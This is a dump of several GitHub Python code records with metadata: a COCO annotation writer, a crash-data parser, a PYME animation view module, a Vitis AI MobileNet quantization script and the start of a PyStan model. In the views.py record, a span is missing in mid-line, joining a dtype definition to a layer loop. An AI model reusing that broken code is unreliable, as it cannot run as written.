'{{\"id\":{0[0]},\"width\":{0[2]},\"height\":{0[3]},\"file_name\":\"{0[1]}\",\"license\":0,\"date_captured\":\"2020-12-25 00:00:00\"}},' \\\n .format(img_par)\n if i == sample_list_size - 1:\n buff_img = '{{\"id\":{0[0]},\"width\":{0[2]},\"height\":{0[3]},\"file_name\":\"{0[1]}\",\"license\":0,\"date_captured\":\"2020-12-25 00:00:00\"}}],\"annotations\":[' \\\n .format(img_par)\n z = open(save, 'a+')\n z.write(buff_img)\n z.close()\n # core = {\"current\": i, \"total\": sample_list_size}\n # print('{current}/{total}'.format(**core))\n\n'''writing annotations'''\nfor i in tqdm.tqdm(range(sample_list_size)):\n seg = sample_SAB[i]['seg']\n area = sample_SAB[i]['area']\n bbox = sample_SAB[i]['bbox']\n kpt = sample_KPT[i]['kpt']\n num_kpt = sample_KPT[i]['num']\n ann_par = [seg, num_kpt, area, kpt, i, bbox, i]\n buff_ann = '{{\"segmentation\":{0[0]},\"num_keypoints\":{0[1]},\"area\":{0[2]},\"iscrowd\":0,\"keypoints\":{0[3]},\"image_id\":{0[4]},\"bbox\":{0[5]},\"category_id\":1,\"id\":{0[6]}}},' \\\n .format(ann_par)\n if i == sample_list_size - 1:\n buff_ann = '{{\"segmentation\":{0[0]},\"num_keypoints\":{0[1]},\"area\":{0[2]},\"iscrowd\":0,\"keypoints\":{0[3]},\"image_id\":{0[4]},\"bbox\":{0[5]},\"category_id\":1,\"id\":{0[6]}}}],' \\\n .format(ann_par)\n z = open(save, 'a+')\n z.write(buff_ann)\n z.close()\n\n'''writing others'''\nothers = '\"licenses\":[{\"id\":0,\"name\":\"Vjshi\",\"url\":\"https://www.vjshi.com/\"}],\"categories\":[{\"id\":1,\"name\":\"plane\",\"supercategory\":\"plane\",\"keypoints\":[\"head\",\"lshdr\",\"rshdr\",\"lwing\",\"rwing\",\"tail\",\"uptail\",\"ltail\",\"rtail\"],\"skeleton\":[[0,1],[0,2],[0,5],[1,2],[1,3],[2,4],[5,6],[5,7],[5,8],[7,8]]}]}'\nz = open(save, 'a+')\nz.write(others)\nz.close()\nprint('done\\n')\n", "repo_name": "MauShawKin/AIR_PE", "sub_path": "making_annotations/via2coco.py", "file_name": "via2coco.py", "file_ext": "py", "file_size_in_byte": 6435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "json.load", "line_number": 20, "usage_type": "call"}, {"api_name": "json.load", "line_number": 85, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 125, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 141, "usage_type": "call"}]} +{"seq_id": "25811274652", "text": "import simplejson\n\n\ndef read_parse_crash():\n lat = list()\n lng = list()\n with open('dataset/crashes/Motor_Vehicle_Collisions_-_Crashes.csv', 'r') as data:\n data.readline().split(',')\n lines = data.readlines()\n for line in lines:\n line = line.strip().split(\",\")\n if line[0][0] == \"1\" or line[0][0] == \"0\":\n if line[0].split('/')[2] == \"2020\" and line[4] != \"\":\n lat.append(float(line[4]))\n lng.append(float(line[5]))\n\n with open('dataset/crashes/crashes_latitude.txt', 'w') as f:\n simplejson.dump(lat, f)\n f.close()\n with open('dataset/crashes/crashes_longitude.txt', 'w') as f:\n simplejson.dump(lng, f)\n f.close()\n\n\nif __name__ == \"__main__\":\n read_parse_crash()\n", "repo_name": "Melnikovartem/sbuhack_2020", "sub_path": "parse_crash.py", "file_name": "parse_crash.py", "file_ext": "py", "file_size_in_byte": 805, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "simplejson.dump", "line_number": 18, "usage_type": "call"}, {"api_name": "simplejson.dump", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "74683187004", "text": "import json\nfrom collections import OrderedDict\n\nimport numpy as np\nfrom scipy.spatial.transform import Rotation, Slerp\n\nimport PYME\nfrom enum import Enum\n\nclipping_dtype = [('x', '= len(canvas.layers):\n print(\"Not enough layers. Need to add more layers manually to be able to load settings.\")\n break\n if fast:\n # These are both 'fast' changes. Points are not recalculated. Works because render engine reads from them every frame.\n if ~np.allclose(layer[\"alpha\"], canvas.layers[i].get_colors()[0, 3]):\n #crude check to see if alpha is different from current\n canvas.layers[i]._colors[:, 3] = layer[\"alpha\"]\n canvas.layers[i].trait_set(trait_change_notify=False, **{'point_size':layer[\"point_size\"]})\n else:\n canvas.layers[i].trait_set(trait_change_notify=True, **{'alpha':layer[\"alpha\"], 'point_size':layer[\"point_size\"]})\n canvas.GrandParent.Parent.Refresh()\n \n def lerp(self, other, t):\n # Should be vectorized so that t can be list-like item\n # Low priority while frames < 1000?\n if t<=0:\n return View.copy(self)\n elif t>=1:\n return View.copy(other)\n else:\n# print(self.rotation)\n# print(other.rotation)\n# t = np.atleast_1d(t)\n rotations = Rotation.from_dcm([[self.vec_up, self.vec_back, self.vec_right], [other.vec_up, other.vec_back, other.vec_right]])\n\n\n interp_rotations = Slerp([0.0, 1.0], rotations)([t]).as_dcm()[0]\n interp_translation = (1-t) * self.translation + t * other.translation\n interp_scale = (1-t) * self.scale + t * other.scale\n interp_clipping = ((1-t) * self.clipping.view('8f4') + t * other.clipping.view('8f4')).view(clipping_dtype)[0]\n\n interp_clip_plane_orientation = Slerp([0.0, 1.0], Rotation.from_quat([self._clip_plane_orientation.as_quat(), other._clip_plane_orientation.as_quat()]))([t]).as_quat()[0]\n interp_clip_plane_position = (1-t) * self.clip_plane_position + t * other.clip_plane_position\n \n binary_interp = t < 0.5\n interp_lut_draw = self.lut_draw if binary_interp else other.lut_draw\n interp_scale_bar = self.scale_bar if binary_interp else other.scale_bar\n interp_axes_visible = self.axes_visible if binary_interp else other.axes_visible\n \n interp_background_color = (1-t) * self.background_color + t * other.background_color\n \n interp_layer0_alpha = (1-t) * self.layer0_alpha + t * other.layer0_alpha\n interp_layer0_point_size = (1-t) * self.layer0_point_size + t * other.layer0_point_size\n \n return View(None,\n interp_rotations[0],\n interp_rotations[1],\n interp_rotations[2],\n interp_translation,\n interp_scale,\n interp_clipping,\n interp_clip_plane_orientation,\n interp_clip_plane_position,\n interp_lut_draw,\n interp_scale_bar,\n interp_background_color,\n interp_axes_visible,\n interp_layer0_alpha,\n interp_layer0_point_size,\n )\n \n @classmethod\n def rotate(cls, view, axis, degree):\n current_rotation = Rotation.from_dcm([view.vec_up, view.vec_back, view.vec_right])\n new_rotation = np.zeros(3, np.float)\n new_rotation[axis] = np.deg2rad(degree)\n combined_rotation = current_rotation * Rotation.from_rotvec(new_rotation)\n combined_rotation_dcm = combined_rotation.as_dcm()\n view.vec_up = combined_rotation_dcm[0]\n view.vec_back = combined_rotation_dcm[1]\n view.vec_right = combined_rotation_dcm[2]\n \n \n\nclass VideoView(View):\n JSON_DURATION = 'duration'\n \n class Interp_mode(Enum):\n LINEAR = 0\n SQUARE = 1\n SQUARE_ROOT = 2\n SMOOTH_STEP_A = 3\n SMOOTH_STEP_B = 4\n \n def __init__(self, view_id='id', vec_up=[0,1,0], vec_back = [0,0,1], vec_right = [1,0,0], translation= [0,0,0], scale=1,\n clipping=dummy_clipping,\n duration = 1.0, interp_mode=Interp_mode.SMOOTH_STEP_B.name,\n# lut_draw=True, scale_bar=1000., background_color=[0,0,0],\n *args, **kwargs):\n \"\"\"\n\n Parameters\n ----------\n view_id is up to you, as long as serializable with json\n vec_up np.array\n vec_back np.array\n vec_right np.array\n translation np.array\n zoom usually a scalar\n duration duration of the view transition in seconds\n \"\"\"\n super(VideoView, self).__init__(view_id, vec_up, vec_back, vec_right, translation, scale, clipping,\n# lut_draw, scale_bar, background_color,\n *args, **kwargs)\n self._duration = float(duration)\n self.interp_mode = VideoView.Interp_mode[interp_mode]\n \n @classmethod\n def from_canvas(cls, canvas, vec_id, duration=1.0, interp_mode=Interp_mode.SMOOTH_STEP_B):\n # reads state from canvas\n # Probably needs updating when PYME updates\n view = canvas.get_view(vec_id) #already a copy, but copy again anyway in case base code changes, can be the basic View class. Not for copying\n args = list([view.view_id,\n view.vec_up,\n view.vec_back,\n view.vec_right,\n view.translation,\n view.scale,\n view.clipping,\n duration,\n interp_mode.name,\n view.clip_plane_orientation,\n view.clip_plane_position,])\n# print(canvas.AxesOverlayLayer)\n args.extend([canvas.LUTDraw,\n canvas.scaleBarLength,\n canvas.clear_colour,\n canvas.AxesOverlayLayer.visible,\n # canvas.layers[0].alpha,\n # canvas.layers[0].point_size,\n ])\n layers_args = list()\n for layer in canvas.layers:\n temp_dict = OrderedDict()\n temp_dict[\"alpha\"] = layer.alpha\n temp_dict[\"point_size\"] = layer.point_size\n layers_args.append(temp_dict)\n args.append(layers_args)\n\n return cls(*args)\n \n# @classmethod\n# def from_view(cls, view, duration=3.0, interp_mode=Interp_mode.SMOOTH_STEP_B):\n# return cls(view.view_id,\n# view.vec_up,\n# view.vec_back,\n# view.vec_right,\n# view.translation,\n# view.scale,\n# view.clipping,\n# duration,\n# interp_mode.name,\n# view.clip_plane_orientation,\n# view.clip_plane_position,\n## view.lut_draw,\n## view.scale_bar,\n## view.background_color,\n# )\n \n @property\n def duration(self):\n return self._duration\n \n @duration.setter\n def duration(self, value):\n if value:\n self._duration = float(value)\n \n def to_json(self):\n ordered_dict = super(VideoView, self).to_json()\n ordered_dict[self.JSON_DURATION] = self._duration\n ordered_dict['interp_mode'] = self.interp_mode.name\n return ordered_dict\n \n @classmethod\n def decode_json(cls, json_obj):\n # # if '__type__' in json_obj and json_obj['__type__'] == View:\n # return VideoView(View.get_json_field(json_obj, View.JSON_VIEW_ID, 'id'),\n # View.get_json_array(json_obj, View.JSON_VEC_UP, numpy.array([0, 1, 0])),\n # View.get_json_array(json_obj, View.JSON_VEC_BACK, numpy.array([0, 0, 1])),\n # View.get_json_array(json_obj, View.JSON_VEC_RIGHT, numpy.array([1, 0, 0])),\n # View.get_json_array(json_obj, View.JSON_TRANSLATION, numpy.array([0, 0, 0])),\n # View.get_json_field(json_obj, View.JSON_ZOOM, 1),\n # View.get_json_field(json_obj, VideoView.JSON_DURATION, 1))\n layers = []\n for key, val in json_obj.items():\n if key.startswith(\"layer\"):\n layer_num = int(key.split(\"_\")[0][5:])\n while layer_num >= len(layers):\n layers.append(OrderedDict())\n layers[layer_num][\"_\".join(key.split(\"_\")[1:])] = val\n json_obj.pop(key)\n\n json_obj[\"layers\"] = layers\n return cls(**json_obj)\n\n\nif __name__ == '__main__':\n view = View(1, np.array([1, 1, 1]), np.array([2, 2, 2]), np.array([3, 3, 3]),\n np.array([0, 0, 0]), 5)\n a = json.loads(json.dumps(view.to_json()))\n view2 = View.decode_json(a)\n", "repo_name": "kkhchung/pyme-animation", "sub_path": "animation/plugins/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 15796, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 13, "usage_type": "call"}, {"api_name": "PYME.LMVis", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 43, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.copy", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation.from_quat", "line_number": 52, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 58, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 194, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation.from_dcm", "line_number": 213, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 213, "usage_type": "name"}, {"api_name": "scipy.spatial.transform.Slerp", "line_number": 216, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Slerp", "line_number": 221, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation.from_quat", "line_number": 221, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 221, "usage_type": "name"}, {"api_name": "scipy.spatial.transform.Rotation.from_dcm", "line_number": 253, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 253, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 254, "usage_type": "attribute"}, {"api_name": "numpy.deg2rad", "line_number": 255, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation.from_rotvec", "line_number": 256, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 256, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 267, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 323, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 388, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 389, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 390, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 390, "usage_type": "call"}]} +{"seq_id": "29497260519", "text": "import os \nimport argparse\nimport time\nimport sys\nfrom myUtils import DatasetGenerator\nimport tensorflow as tf\nfrom tensorflow_model_optimization.quantization.keras import vitis_quantize\n\n\"\"\"\n./docker_run.sh xilinx/vitis-ai:1.3.411\n\nAttention to 1/31 [..............................] - ETA: 0sKilled that means the RAM is not enougth\n\"\"\"\n\ndef getDataset(path, imageSize, start, stop):\n # datasetPath = os.path.join(path, f\"dataset_{imageSize}_{start}_{stop}\")\n # if not os.path.exists(datasetPath):\n t0 = time.time()\n print(\"\\nStart make dataset\")\n print(path)\n print(f\"Start image index: {start}\")\n print(f\"Stop image index: {stop}\")\n print(f\"imageSize: {imageSize}\")\n datasetGenerator = DatasetGenerator(batch_size=32, startImageNumber=start, stopImageNumber=stop, width=imageSize, height=imageSize)\n batchedDataset = datasetGenerator.make_dataset()\n # print(f\"Number of images: {len(batchedDataset)}\")\n # print(f\"Dataset spec: {batchedDataset.element_spec}\") # (TensorSpec(shape=(32,), dtype=tf.float32, name=None), TensorSpec(shape=(32,), dtype=tf.float32, name=None))\n t1 = time.time()\n print(f\"Stop make dataset. Time: {t1-t0}\")\n # print(\"Saving dataset on disk\")\n # tf.data.experimental.save(batchedDataset, datasetPath)\n # t1 = time.time()\n # print(f\"Dataset saved on disk. Time: {t1-t0}\")\n \n # else:\n # print(\"Loading Dataset from disk\")\n # t0 = time.time()\n # batchedDataset = tf.data.experimental.load(datasetPath, element_spec=(tf.TensorSpec(shape=[32,imageSize,imageSize,3], dtype=tf.float32), tf.TensorSpec(shape=[32,1], dtype=tf.float32)))\n # print(f\"Number of images: {len(batchedDataset)}\")\n # t1 = time.time()\n # print(f\"Dataset loaded. Time: {t1-t0}\")\n\n return batchedDataset\n\ndef quantization(model, preprocessQuantDataPath, alpha, imageSize, start, stop):\n batchedQuantDataset = getDataset(preprocessQuantDataPath, imageSize, start, stop)\n\n print(\"Start Quantization\")\n t0 = time.time()\n quantizer = vitis_quantize.VitisQuantizer(model)\n quantized_model = quantizer.quantize_model(calib_dataset=batchedQuantDataset)\n quantized_model.save(os.path.join(\"tf2_vai_quant_models\",f\"quantized_mobilenet_{alpha}_{imageSize}.h5\"))\n t1 = time.time()\n print(f\"Stop Quantization. Time: {t1-t0}\")\n\ndef validation(preprocessValDataPath, alpha, imageSize, start, stop):\n batchedValidationDataset = getDataset(preprocessValDataPath, imageSize, start, stop)\n\n print(\"Start Validation of the quantized model\")\n t0 = time.time()\n with vitis_quantize.quantize_scope():\n modelPath = os.path.join(\"tf2_vai_quant_models\",f\"quantized_mobilenet_{alpha}_{imageSize}.h5\")\n quantized_model = tf.keras.models.load_model(modelPath, compile=False)\n\n quantized_model.compile(\t\n loss=tf.keras.losses.SparseCategoricalCrossentropy(),\n metrics= [tf.keras.metrics.SparseCategoricalAccuracy(), tf.keras.metrics.SparseTopKCategoricalAccuracy(k=5)]) \n print(\"Validation accuracy:\")\n quantized_model.evaluate(batchedValidationDataset, verbose=2)\n t1 = time.time()\n print(f\"Stop Validation. Time: {t1-t0}\")\n\ndef validateOriginalTf2Model(model, preprocessValDataPath, alpha, imageSize, start, stop):\n batchedValidationDataset = getDataset(preprocessValDataPath, imageSize, start, stop)\n model.compile(\t\n loss=tf.keras.losses.SparseCategoricalCrossentropy(),\n metrics= [tf.keras.metrics.SparseCategoricalAccuracy(), tf.keras.metrics.SparseTopKCategoricalAccuracy(k=5)]) \n print(\"Start validate original tf2 model\")\n print(\"Validation accuracy:\")\n t0 = time.time()\n model.evaluate(batchedValidationDataset, verbose=2)\n t1 = time.time()\n print(f\"Stop Validation. Time: {t1-t0}\")\n\ndef validateOriginalTf2Model_withTf2utilsPreprocess(alpha, imageSize, start, stop):\n i = tf.keras.layers.Input([None, None, 3], dtype = tf.uint8)\n x = tf.cast(i, tf.float32)\n x = tf.keras.applications.mobilenet.preprocess_input(x)\n core = tf.keras.applications.MobileNet(alpha=alpha, input_shape=(imageSize,imageSize,3))\n x = core(x)\n model = tf.keras.Model(inputs=[i], outputs=[x])\n\n datasetGenerator = DatasetGenerator(batch_size=32, startImageNumber=start, stopImageNumber=stop, width=imageSize, height=imageSize)\n batchedDataset = datasetGenerator.make_dataset_without_preprocessing()\n\n model.compile(\t\n loss=tf.keras.losses.SparseCategoricalCrossentropy(),\n metrics= [tf.keras.metrics.SparseCategoricalAccuracy(), tf.keras.metrics.SparseTopKCategoricalAccuracy(k=5)]) \n print(\"Start validate original tf2 model\")\n print(\"Validation accuracy:\")\n t0 = time.time()\n model.evaluate(batchedDataset, verbose=2)\n t1 = time.time()\n print(f\"Stop Validation. Time: {t1-t0}\")\n\ndef compiler(dpu, alpha, imageSize):\n outputPath = os.path.join(\"tf2_vai_compiled_models\", dpu, f\"tf2_mobilenet_v1_{alpha}_{imageSize}_{dpu}\")\n quantModelPath = os.path.join(\"tf2_vai_quant_models\",f\"quantized_mobilenet_{alpha}_{imageSize}.h5\")\n archPath = os.path.join(\"Arch_files\", f\"arch_{dpu}.json\")\n\n if os.path.exists(outputPath) is False:\n os.makedirs(outputPath)\n\n \n shell_command = f\"vai_c_tensorflow2 \\\n -m {quantModelPath} \\\n -a {archPath} \\\n -o {outputPath} \\\n -n tf2mobilenet_v1_{alpha}_{imageSize}_{dpu}\" \n\n stream = os.popen(shell_command)\n output = stream.read()\n print(output)\n \n\ndef main():\n alphaChoices = [1.0, 0.75, 0.5, 0.25]\n imageSizeChoices = [224, 192, 160, 128]\n dpuChoices = [\"B4096\", \"B3136\", \"B2304\", \"B1600\", \"B1152\", \"B1024\", \"B800\", \"B512\"]\n tfModelsPath = os.path.join(\"tf_models\")\n preprocessValDataPath = os.path.join(\"tf2_preprocessDatasets\", \"validationDatasets\")\n preprocessQuantDataPath = os.path.join(\"tf2_preprocessDatasets\", \"quantizationDatasets\")\n\n if not os.path.exists(tfModelsPath):\n os.mkdir(tfModelsPath)\n\n if not os.path.exists(preprocessValDataPath):\n os.makedirs(preprocessValDataPath)\n\n if not os.path.exists(preprocessQuantDataPath):\n os.makedirs(preprocessQuantDataPath)\n \n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-a\", \"--alpha\", type=float, default=1.0, choices=alphaChoices, help=\"Default: 1.0\")\t\n parser.add_argument(\"-s\", \"--imageSize\", type=int, default=224, choices=imageSizeChoices, help=\"Default: 224\")\n parser.add_argument(\"--startQuant\", type=int, default=0)\n parser.add_argument(\"--stopQuant\", type=int, default=1024)\n parser.add_argument(\"--startVal\", type=int, default=1024)\n parser.add_argument(\"--stopVal\", type=int, default=2048)\n parser.add_argument(\"-d\", \"--dpu\", type=str, default=\"B4096\",choices=dpuChoices , help=\"Default: B4096\")\n parser.add_argument(\"-v\", \"--verbose\", action='store_true')\n parser.add_argument(\"-q\", \"--quantize\", action='store_true', help=\"If you want start the quantization -q\")\n parser.add_argument(\"--validate\", action=\"store_true\", help=\"If you want to validate the quantized model --validate\") \n parser.add_argument(\"--validateOriginal\", action=\"store_true\", help=\"If you want to validate the original tf2 model --validateOriginal\")\n parser.add_argument(\"-c\", \"--compile\", action='store_true', help=\"If you want start the compilation -q\")\n # parser.add_argument(\"-o\", \"--outputLayer\", type=str, default=\"MobilenetV1/Predictions/Reshape\") # MobilenetV1/Predictions/Reshape_1\n args = parser.parse_args()\n\n print(\"************************************\")\n print(\"INPUT PARAMETERS:\")\n print(f\"\\tmodel: mobilenet_v1_{args.alpha}_{args.imageSize}\")\n print(f\"\\tDPU: {args.dpu}\")\n # print(f\"\\tOutput Layer: {args.outputLayer}\")\n print(f\"\\tExecute quantization: {args.quantize}\")\n print(f\"\\tExecute compilation: {args.compile}\")\n print(\"************************************\")\n\n model = tf.keras.applications.MobileNet(alpha=args.alpha, input_shape=(args.imageSize,args.imageSize,3))\n\n modelPath = os.path.join(tfModelsPath, f\"tf2_mobilenet_v1_{args.alpha}_{args.imageSize}\")\n if not os.path.exists(modelPath):\n model.save(modelPath)\n model = tf.keras.applications.MobileNet(alpha=args.alpha, input_shape=(args.imageSize,args.imageSize,3))\n else:\n model = tf.keras.models.load_model(modelPath, compile=False)\n\n if args.verbose:\n print(model.summary())\n\n if args.quantize: \n quantization(model, preprocessQuantDataPath, args.alpha, args.imageSize, args.startQuant, args.stopQuant)\n\n if args.validate:\n validation(preprocessValDataPath, args.alpha, args.imageSize, args.startVal, args.stopVal)\n\n if args.validateOriginal:\n # validateOriginalTf2Model(model, preprocessValDataPath, args.alpha, args.imageSize, args.startVal, args.stopVal)\n validateOriginalTf2Model_withTf2utilsPreprocess(args.alpha, args.imageSize, args.startVal, args.stopVal)\n\n if args.compile:\n compiler(args.dpu, args.alpha, args.imageSize)\n \n\nif __name__ == \"__main__\":\n main()", "repo_name": "GabrieleCuni/Xilinx-Flow", "sub_path": "tf2_vai_flow.py", "file_name": "tf2_vai_flow.py", "file_ext": "py", "file_size_in_byte": 9114, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "time.time", "line_number": 18, "usage_type": "call"}, {"api_name": "myUtils.DatasetGenerator", "line_number": 24, "usage_type": "call"}, {"api_name": "time.time", "line_number": 28, "usage_type": "call"}, {"api_name": "time.time", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow_model_optimization.quantization.keras.vitis_quantize.VitisQuantizer", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow_model_optimization.quantization.keras.vitis_quantize", "line_number": 50, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 53, "usage_type": "call"}, {"api_name": "time.time", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow_model_optimization.quantization.keras.vitis_quantize.quantize_scope", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow_model_optimization.quantization.keras.vitis_quantize", "line_number": 61, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.losses.SparseCategoricalCrossentropy", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.SparseCategoricalAccuracy", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.SparseTopKCategoricalAccuracy", "line_number": 67, "usage_type": "call"}, {"api_name": "time.time", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.SparseCategoricalCrossentropy", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 76, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.SparseCategoricalAccuracy", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.SparseTopKCategoricalAccuracy", "line_number": 77, "usage_type": "call"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "time.time", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Input", "line_number": 86, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 86, "usage_type": "attribute"}, {"api_name": "tensorflow.uint8", "line_number": 86, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 87, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.applications.mobilenet.preprocess_input", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.applications.MobileNet", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 89, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Model", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 91, "usage_type": "attribute"}, {"api_name": "myUtils.DatasetGenerator", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.SparseCategoricalCrossentropy", "line_number": 97, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 97, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.SparseCategoricalAccuracy", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.SparseTopKCategoricalAccuracy", "line_number": 98, "usage_type": "call"}, {"api_name": "time.time", "line_number": 101, "usage_type": "call"}, {"api_name": "time.time", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path", "line_number": 107, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 112, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path", "line_number": 134, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path", "line_number": 137, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 141, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 144, "usage_type": "call"}, {"api_name": "tensorflow.keras.applications.MobileNet", "line_number": 169, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 169, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path", "line_number": 171, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path", "line_number": 172, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.applications.MobileNet", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 174, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 176, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 176, "usage_type": "attribute"}]} +{"seq_id": "36845038646", "text": "import pystan\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nplt.style.use('seaborn-darkgrid')\n\nbayesreg_code = \"\"\"\ndata {\n int N;\n vector[N] x;\n vector[N] y;\n}\nparameters {\n real beta;\n real alpha;\n real sigma;\n}\nmodel {\n beta ~ normal(0, 1);\n alpha ~ normal(0, 1);\n sigma ~ normal(0, 1);\n \n y ~ normal(beta * x + alpha, sigma);\n}\n \n\"\"\"\n\nx = 